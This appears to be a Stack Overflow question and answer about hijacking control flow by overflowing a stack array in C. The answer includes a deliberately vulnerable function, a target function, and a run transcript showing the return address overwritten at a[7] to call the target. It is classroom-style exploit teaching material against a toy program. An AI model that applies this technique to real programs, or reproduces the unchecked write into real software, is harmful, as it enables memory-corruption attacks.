# How can I invoke a function using buffer overflow?

Tags: c, buffer-overflow

I have this block of code which obviously contains a buffer overflow, because I can enter more than 4 values into array a. I want to call a function using buffer overflow. I know the address of this function. I know that I need to overwrite the functions return address, but I'm not sure how to actually do this? Also, if I set n = 5 and write in 5 values to array a, the program does not crash, even though there is only memory allocated for 4 values. Why is this, and what can I do to get the program to crash? I'm using an older release of Ubuntu that doesn't check for buffer overflows.

```
int a[4];
for (i = 0;i <n ;i++)
printf ("\n a[%d] = %x, address = %x", i, a[i], &a[i]);
printf("\nEnter %d HEX Values \n", n);
for (i=0;i<n;i++)  
  scanf("%x",&a[i]);
   printf("Done reading\n");
```

Comment: It's unclear what you want and why.

Comment: Write more data, it will eventually crash with enough data. You need to get to overwrite the return values stored in stack.

Comment: You will need more information (or a lot of patience during trial & error) to successfully exploit this code.  At the very least, you'd need the code of the whole function and know the architecture, compiler and operating system.

Comment: @5gon12eder Absolutely exaggerated. You definitely need to know the architecture, but that's pretty much about it.

Comment: I need to call a function with the address: 8408414. I know that I can use the buffer overflow that exists in the code above to call this function, but I'm not sure quite how to do that. This was presented in class as an example, but I can't replicate it, so I'm obviously missing something. Hopefully that makes more sense.

Comment: @m0skit0 How would you know where the return address is located if you don't know the whole function?  What I meant to say was that given only the above code, nobody will be able to say “enter `543mfrk3` and the exploit will work in this and that way”.

Comment: It seems that the return address is located after a[5]. When I enter the address of the function that I want to call into a[6], it works. I don't understand this completely, but it is working.

Comment: @5gon12eder The return address is on the stack. You want to overwrite THIS function return address. You can later do analysis of binary to find the loaded address for the function you want to call. Anyway, first step is to overwrite the current return address. You will succeed if you get a segmentation fault.

Comment: Look up "Smashing the stack for fun and profit".  It's a good starting place.

Comment: @m0skit0 I know that but you still need to know *where* on the stack the return address for *this* function is.  You might have silently assumed that the above snippet is the entire code of the no-arg void function (at least, no more local variables) but then we are essentially saying the same thing.  Clearly, if the compiler arranges there to be a `char buff[1000]` after the `int a[4]` array, writing into `a[5]` will not do the trick.  You could try overwriting “everything” with the wanted address but I'm pretty sure that for any given input we can find a function where it won't work.

Answer (score 0):

Here is an exploit that worked on my system (GCC on x86_64 GNU/Linux).  Please don't tell me that you've tried it and it “didn't work” – the program deliberately invokes undefined behavior and this is, by its very nature, not portable.  There is nothing in the C standard that says a compiler must produce code that is easy to exploit in a portable manner.

To give a complete example, I have modified the code a little.  First some headers:

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
```

Here is the vulnerable function we wish to exploit:

```c
static int
vulnerable(void)
{
  uint64_t a[4];
  int n;
  int i;
  for (i = 0; i < 10; ++i)
    printf("a[%d] = 0x%016lX\n", i, a[i]);
  printf("Enter the number of values:  ");
  scanf("%d", &n);
  for (i = 0; i < n; ++i)
    {
      printf("Enter value %d of %d:  ", i, n);
      uint64_t temp;
      scanf("%lX", &temp);
      if (temp)
        a[i] = temp;
    }
  for (i = 0; i < 10; ++i)
    printf("a[%d] = 0x%016lX\n", i, a[i]);
  return n;
}
```

I have modified the code a little such that it will only write non-zero values.  This makes it a little less likely that we overwrite something we don't want to overwrite.  This is of course unnecessary as in this case we could have equally well simply input the value that we know was already stored at the address.

And here is the function we'd like to call:

```c
static void
target(void)
{
  printf("Exploit succeeded!\n");
  exit(0);
}
```

To avoid having to read assembly or decompile objects, we'll add some diagnostic output to the `main` function.  It should be clear that the exploit doesn't rely on this.

```c
int
main()
{
  assert(sizeof(void *) == sizeof(uint64_t));  /* (1) */
  printf("%p  return\n", (&&label));           /* (2) */
  printf("%p  target\n", target);              /* (3) */
  vulnerable();
 label:
  return 0;
}
```

Line (1) is just to make sure we are assuming the correct address size.  On line (2) we print the return address that will be on the stack when `vulnerable` is called.  (The `&&label` syntax is a GCC extension to get the address of a label.)  Line (3) prints out the address of our target function.

We don't want the compiler to do smart things that might spoil our exploit so we'll disable all optimizations and compile like:

```
$ gcc -O0 -o main main.c -static
```

Then, as we run the program, it might output the following:

```
$ ./main
0x400e44  return
0x400dfb  target
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400E44
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
```

We quickly spot the return address at offset 7.
We might have gained the same knowledge from carefully reading the assembly code.  Knowing what we have to do, we feed the program with:

```
Enter the number of values:  8
Enter value 0 of 8:  0
Enter value 1 of 8:  0
Enter value 2 of 8:  0
Enter value 3 of 8:  0
Enter value 4 of 8:  0
Enter value 5 of 8:  0
Enter value 6 of 8:  0
Enter value 7 of 8:  0x400dfb
```

The following output shows us that we have successfully overwritten the return address and that the exploit actually succeeded.

```
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400DFB
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
Exploit succeeded!
```